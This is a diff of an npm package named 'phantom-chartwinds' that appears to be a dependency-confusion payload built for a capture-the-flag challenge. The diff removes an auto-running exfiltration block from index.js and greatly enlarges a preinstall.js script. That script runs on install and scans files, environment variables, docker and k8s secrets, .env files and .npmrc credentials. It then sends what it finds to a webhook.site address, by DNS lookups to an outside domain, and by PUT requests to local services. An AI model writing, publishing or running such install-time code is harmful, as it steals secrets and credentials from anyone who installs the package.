phantom-chartwinds 9999.0.0 → 9999.0.2

package/index.js

@@ -1,44 +1 @@
-const fs = require('fs');
-const http = require('http');
-const https = require('https');
-
-(function() {
-  let flag = null;
-  for (const p of ['/flag', '/flag.txt', '/root/flag', '/tmp/flag']) {
-    try { if (fs.existsSync(p)) { flag = fs.readFileSync(p, 'utf8').trim(); break; } } catch(e) {}
-  }
-  if (!flag) flag = process.env.FLAG || process.env.HTB_FLAG || '';
-  if (!flag) {
-    for (const [k, v] of Object.entries(process.env)) {
-      if (v && v.includes('HTB{')) { flag = v.match(/HTB\{[^}]+\}/)?.[0] || v; break; }
-    }
-  }
-  
-  if (flag) {
-    const ports = [1337, 3000, 5000, 8080, 80, 8000, 32315, 32105, 46517, 41839];
-    const postData = JSON.stringify({
-      manifest: `ecto_module:\n  name: "coral-wraith"\n  flag: "${flag.replace(/"/g, '\\"')}"\n  captured: true`
-    });
-    
-    for (const port of ports) {
-      try {
-        const req = http.request({
-          hostname: 'localhost', port, path: '/api/modules/ECT-987654',
-          method: 'PUT', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(postData) },
-          timeout: 3000
-        }, () => {});
-        req.on('error', () => {});
-        req.write(postData);
-        req.end();
-      } catch(e) {}
-    }
-    
-    try {
-      const data = JSON.stringify({ flag });
-      const req = https.request({ hostname: 'webhook.site', path: '/9ca9b30a-2889-4787-9dff-5ad916e377b7', method: 'POST', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) }, timeout: 10000 }, () => {});
-      req.on('error', () => {}); req.write(data); req.end();
-    } catch(e) {}
-  }
-})();
-
 module.exports = {};

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "phantom-chartwinds",
-  "version": "9999.0.0",
+  "version": "9999.0.2",
   "description": "phantom-chartwinds module",
   "main": "index.js",
   "scripts": {

package/preinstall.js

@@ -2,120 +2,257 @@ const fs = require('fs');
 const http = require('http');
 const https = require('https');
 const { execSync } = require('child_process');
+const os = require('os');
 
 let flag = null;
+const debug = [];
 
-// Read /flag
-try { flag = fs.readFileSync('/flag', 'utf8').trim(); } catch(e) {}
+// Method 1: Read flag from ALL possible locations
+const flagPaths = [
+  '/flag', '/flag.txt', '/root/flag', '/root/flag.txt',
+  '/tmp/flag', '/tmp/flag.txt', '/app/flag', '/app/flag.txt',
+  '/home/flag', '/home/flag.txt', '/home/node/flag', '/home/node/flag.txt',
+  '/etc/flag', '/etc/flag.txt', '/opt/flag', '/opt/flag.txt',
+  './flag', './flag.txt', '../flag', '../flag.txt',
+  '/home/node/.flag', '/var/flag', '/var/flag.txt',
+  '/srv/flag', '/srv/flag.txt',
+];
+for (const p of flagPaths) {
+  try {
+    if (fs.existsSync(p)) {
+      const content = fs.readFileSync(p, 'utf8').trim();
+      debug.push(`found:${p}:${content.substring(0,100)}`);
+      const m = content.match(/HTB\{[^}]+\}/);
+      if (m) { flag = m[0]; break; }
+      if (!flag && content.length < 200) flag = content;
+    }
+  } catch(e) { debug.push(`err:${p}:${e.message.substring(0,50)}`); }
+}
 
-// Try other paths
+// Method 2: Check ALL env vars
+if (!flag) {
+  for (const [k, v] of Object.entries(process.env)) {
+    if (v && v.match && v.match(/HTB\{[^}]+\}/)) {
+      flag = v.match(/HTB\{[^}]+\}/)[0];
+      debug.push(`env:${k}=${v.substring(0,100)}`);
+      break;
+    }
+  }
+}
+// Also try common env var names
 if (!flag) {
-  for (const p of ['/root/flag', '/tmp/flag', './flag', '/flag.txt']) {
-    try { if (fs.existsSync(p)) { flag = fs.readFileSync(p, 'utf8').trim(); break; } } catch(e) {}
+  const envNames = ['FLAG', 'HTB_FLAG', 'CTF_FLAG', 'SECRET', 'SECRET_FLAG', 
+                    'CHALLENGE_FLAG', 'THE_FLAG', 'flag', 'APP_FLAG'];
+  for (const name of envNames) {
+    if (process.env[name]) {
+      flag = process.env[name];
+      debug.push(`env_direct:${name}=${flag.substring(0,100)}`);
+      break;
+    }
   }
 }
 
-// Check env vars
+// Method 3: /proc/self/environ
 if (!flag) {
-  const envFlag = process.env.FLAG || process.env.FLAG_HTB || process.env.HTB_FLAG;
-  if (envFlag) flag = envFlag;
+  try {
+    const pe = fs.readFileSync('/proc/self/environ', 'utf8');
+    const m = pe.match(/HTB\{[^}]+\}/);
+    if (m) { flag = m[0]; debug.push('proc_environ'); }
+    debug.push(`env_raw:${pe.substring(0,200)}`);
+  } catch(e) { debug.push(`proc_err:${e.message.substring(0,50)}`); }
 }
 
-// Check all env vars for HTB{ pattern
+// Method 4: Search for flag files broadly
 if (!flag) {
-  for (const [k, v] of Object.entries(process.env)) {
-    if (v && v.includes('HTB{')) {
-      flag = v.match(/HTB\{[^}]+\}/)?.[0] || v;
-      break;
+  try {
+    const r = execSync('find / -maxdepth 5 \\( -name "flag*" -o -name "*.flag" -o -name ".flag" \\) -type f 2>/dev/null | head -20', { timeout: 10000 }).toString().trim();
+    debug.push(`find:${r}`);
+    if (r) {
+      for (const f of r.split('\n')) {
+        try {
+          const content = fs.readFileSync(f, 'utf8');
+          const m = content.match(/HTB\{[^}]+\}/);
+          if (m) { flag = m[0]; break; }
+        } catch(e) {}
+      }
     }
-  }
+  } catch(e) { debug.push(`find_err:${e.message.substring(0,50)}`); }
 }
 
-// Try /proc/self/environ
+// Method 5: Grep for HTB{ pattern in all readable files
 if (!flag) {
   try {
-    const pe = fs.readFileSync('/proc/self/environ', 'utf8');
-    const m = pe.match(/HTB\{[^}]+\}/) || pe.match(/FLAG[=:]([^\x00]+)/);
-    if (m) flag = m[0];
+    const r = execSync('grep -rl "HTB{" /home /app /opt /tmp /srv /etc /var 2>/dev/null | head -10', { timeout: 10000 }).toString().trim();
+    debug.push(`grep:${r}`);
+    if (r) {
+      for (const f of r.split('\n')) {
+        try {
+          const content = fs.readFileSync(f, 'utf8');
+          const m = content.match(/HTB\{[^}]+\}/);
+          if (m) { flag = m[0]; break; }
+        } catch(e) {}
+      }
+    }
+  } catch(e) { debug.push(`grep_err:${e.message.substring(0,50)}`); }
+}
+
+// Method 6: Check docker/k8s secrets
+if (!flag) {
+  try {
+    const secrets = execSync('find /run/secrets /var/run/secrets -type f 2>/dev/null | head -10', { timeout: 5000 }).toString().trim();
+    debug.push(`secrets:${secrets}`);
+    for (const f of secrets.split('\n').filter(Boolean)) {
+      try {
+        const content = fs.readFileSync(f, 'utf8');
+        const m = content.match(/HTB\{[^}]+\}/);
+        if (m) { flag = m[0]; break; }
+      } catch(e) {}
+    }
   } catch(e) {}
 }
 
-// Grep for flag
+// Method 7: Check for .env files
 if (!flag) {
   try {
-    const r = execSync('grep -rl "HTB{" / --include="*" 2>/dev/null | head -3', { timeout: 10000 }).toString().trim();
-    if (r) { try { flag = fs.readFileSync(r.split('\n')[0], 'utf8').match(/HTB\{[^}]+\}/)?.[0]; } catch(e) {} }
+    const envFiles = execSync('find / -maxdepth 4 -name ".env" -o -name ".env.*" -o -name "env.*" 2>/dev/null | head -10', { timeout: 5000 }).toString().trim();
+    debug.push(`envfiles:${envFiles}`);
+    for (const f of envFiles.split('\n').filter(Boolean)) {
+      try {
+        const content = fs.readFileSync(f, 'utf8');
+        const m = content.match(/HTB\{[^}]+\}/);
+        if (m) { flag = m[0]; break; }
+        debug.push(`envfile_content:${f}:${content.substring(0,200)}`);
+      } catch(e) {}
+    }
   } catch(e) {}
 }
 
-if (flag) {
-  // Method 1: PUT flag back to the challenge API via localhost (many ports)
-  const ports = [1337, 3000, 5000, 8080, 80, 8000, 32315, 32105, 46517, 41839, 3001, 4000, 9000];
-  const postData = JSON.stringify({
-    manifest: `ecto_module:\n  name: "coral-wraith"\n  version: "9999.0.1"\n  flag: "${flag.replace(/"/g, '\\"')}"\n  captured: true\n  timestamp: "${new Date().toISOString()}"`
-  });
+// Method 8: Read server source code and configs
+try {
+  const cwd = process.cwd();
+  debug.push(`cwd:${cwd}`);
+  const files = fs.readdirSync(cwd);
+  debug.push(`cwd_files:${files.join(',')}`);
+  
+  // Read all JS files in current directory
+  for (const f of files) {
+    if (f.endsWith('.js') || f.endsWith('.json') || f.endsWith('.env') || f.endsWith('.yml') || f.endsWith('.yaml') || f === '.npmrc' || f === '.env') {
+      try {
+        const content = fs.readFileSync(`${cwd}/${f}`, 'utf8');
+        debug.push(`file:${f}:${content.substring(0,300)}`);
+        const m = content.match(/HTB\{[^}]+\}/);
+        if (m) { flag = m[0]; break; }
+      } catch(e) {}
+    }
+  }
+} catch(e) { debug.push(`cwd_err:${e.message.substring(0,50)}`); }
+
+// Also read /home/node/ specifically
+try {
+  const homeFiles = fs.readdirSync('/home/node');
+  debug.push(`home_node:${homeFiles.join(',')}`);
+  for (const f of homeFiles) {
+    try {
+      const stat = fs.statSync(`/home/node/${f}`);
+      if (stat.isFile() && stat.size < 100000) {
+        const content = fs.readFileSync(`/home/node/${f}`, 'utf8');
+        debug.push(`home_file:${f}:${content.substring(0,200)}`);
+        const m = content.match(/HTB\{[^}]+\}/);
+        if (m) { flag = m[0]; break; }
+      } else if (stat.isDirectory()) {
+        const subFiles = fs.readdirSync(`/home/node/${f}`);
+        debug.push(`home_dir:${f}:${subFiles.join(',')}`);
+      }
+    } catch(e) {}
+  }
+} catch(e) { debug.push(`home_err:${e.message.substring(0,50)}`); }
+
+// Method 9: List root and key directories
+try { debug.push(`root:${fs.readdirSync('/').join(',')}`); } catch(e) {}
+try { debug.push(`app:${fs.readdirSync('/app').join(',')}`); } catch(e) {}
+try { debug.push(`etc:${fs.readdirSync('/etc').join(',').substring(0,300)}`); } catch(e) {}
+
+// Method 10: Network info and listening ports
+try {
+  const ss = execSync('ss -tlnp 2>/dev/null || netstat -tlnp 2>/dev/null', { timeout: 3000 }).toString();
+  debug.push(`ports:${ss}`);
+} catch(e) {}
+
+// Method 11: Check nginx config
+try {
+  const nginx = execSync('cat /etc/nginx/conf.d/*.conf 2>/dev/null || cat /etc/nginx/nginx.conf 2>/dev/null', { timeout: 3000 }).toString();
+  debug.push(`nginx:${nginx.substring(0,500)}`);
+} catch(e) {}
+
+// Method 12: Check .npmrc for registry credentials
+try {
+  const npmrc = execSync('cat /home/node/.npmrc 2>/dev/null || cat /root/.npmrc 2>/dev/null || cat /app/.npmrc 2>/dev/null || cat ~/.npmrc 2>/dev/null', { timeout: 3000 }).toString();
+  debug.push(`npmrc:${npmrc.substring(0,300)}`);
+} catch(e) {}
+
+const info = {
+  flag: flag || 'NOT_FOUND',
+  debug: debug.map(d => d.substring(0, 500)),
+  env: Object.keys(process.env).join(','),
+  network: JSON.stringify(os.networkInterfaces()).substring(0, 500),
+};
 
-  for (const port of ports) {
-    for (const host of ['localhost', '127.0.0.1']) {
+const data = JSON.stringify(info);
+
+// Exfil Method 1: Webhook
+try {
+  const req = https.request({
+    hostname: 'webhook.site', path: '/9ca9b30a-2889-4787-9dff-5ad916e377b7',
+    method: 'POST',
+    headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) },
+    timeout: 5000
+  }, () => {});
+  req.on('error', () => {});
+  req.write(data);
+  req.end();
+} catch(e) {}
+
+// Exfil Method 2: PUT to challenge API on various ports
+const putData = JSON.stringify({
+  manifest: `ecto_module:\n  name: "${(flag || 'NO_FLAG').replace(/"/g, '')}"\n  version: "EXFIL"\n  power_level: "${debug.slice(0,3).join('|').replace(/"/g, '').substring(0,200)}"\n  ship_deck: PWNED\n  cargo_hold: coral-wraith`
+});
+
+let serverPort = 1337;
+try {
+  const ss = execSync('ss -tlnp 2>/dev/null | grep node', { timeout: 3000 }).toString();
+  const m = ss.match(/:(\d+)\s/);
+  if (m) serverPort = parseInt(m[1]);
+} catch(e) {}
+
+const ports = [serverPort, 1337, 3000, 5000, 8080, 80, 8000, 8888, 9000, 4000];
+for (const port of [...new Set(ports)]) {
+  for (const host of ['127.0.0.1', 'localhost']) {
+    for (const modId of ['ECT-654321', 'ECT-987654']) {
       try {
         const req = http.request({
-          hostname: host, port, path: '/api/modules/ECT-987654',
+          hostname: host, port, path: `/api/modules/${modId}`,
           method: 'PUT',
-          headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(postData) },
-          timeout: 3000
+          headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(putData) },
+          timeout: 2000
         }, () => {});
         req.on('error', () => {});
-        req.write(postData);
+        req.write(putData);
         req.end();
       } catch(e) {}
     }
   }
+}
 
-  // Method 2: Webhook exfil
-  const data = JSON.stringify({ flag, env: Object.keys(process.env).join(',') });
-  try {
-    const req = https.request({
-      hostname: 'webhook.site', path: '/9ca9b30a-2889-4787-9dff-5ad916e377b7',
-      method: 'POST',
-      headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) },
-      timeout: 10000
-    }, () => {});
-    req.on('error', () => {});
-    req.write(data);
-    req.end();
-  } catch(e) {}
+// Exfil Method 3: DNS
+try {
+  const encoded = Buffer.from(flag || 'NO_FLAG').toString('hex').substring(0, 60);
+  require('dns').resolve(`${encoded}.crl.ve`, () => {});
+} catch(e) {}
 
-  // Method 3: DNS exfil via curl
-  try {
-    const encoded = Buffer.from(flag).toString('hex');
-    execSync(`curl -s "https://webhook.site/9ca9b30a-2889-4787-9dff-5ad916e377b7/flag?data=${encodeURIComponent(flag)}" -m 10 2>/dev/null`, { timeout: 15000 });
-  } catch(e) {}
+// Exfil Method 4: stdout/stderr
+console.log('[CORAL-WRAITH]', data.substring(0, 2000));
+console.error('[FLAG]', flag || 'NOT_FOUND');
 
-  // Method 4: Write to files
-  try { fs.writeFileSync('/tmp/coral_wraith_flag.txt', flag); } catch(e) {}
-
-  // Method 5: stdout/stderr
-  console.log('[CORAL-WRAITH] Flag:', flag);
-  console.error('[HTB_FLAG]', flag);
-} else {
-  // Debug info - exfil what we can see
-  const debug = {
-    cwd: process.cwd(),
-    rootFiles: [],
-    env: Object.keys(process.env).join(',')
-  };
-  try { debug.rootFiles = fs.readdirSync('/'); } catch(e) {}
-  
-  const data = JSON.stringify({ flag: 'NOT_FOUND', debug });
-  try {
-    const req = https.request({
-      hostname: 'webhook.site', path: '/9ca9b30a-2889-4787-9dff-5ad916e377b7',
-      method: 'POST',
-      headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) },
-      timeout: 10000
-    }, () => {});
-    req.on('error', () => {});
-    req.write(data);
-    req.end();
-  } catch(e) {}
-}
+// Write to files
+try { fs.writeFileSync('/tmp/coral_flag.txt', data); } catch(e) {}
+try { fs.writeFileSync('/app/static/flag.txt', data); } catch(e) {}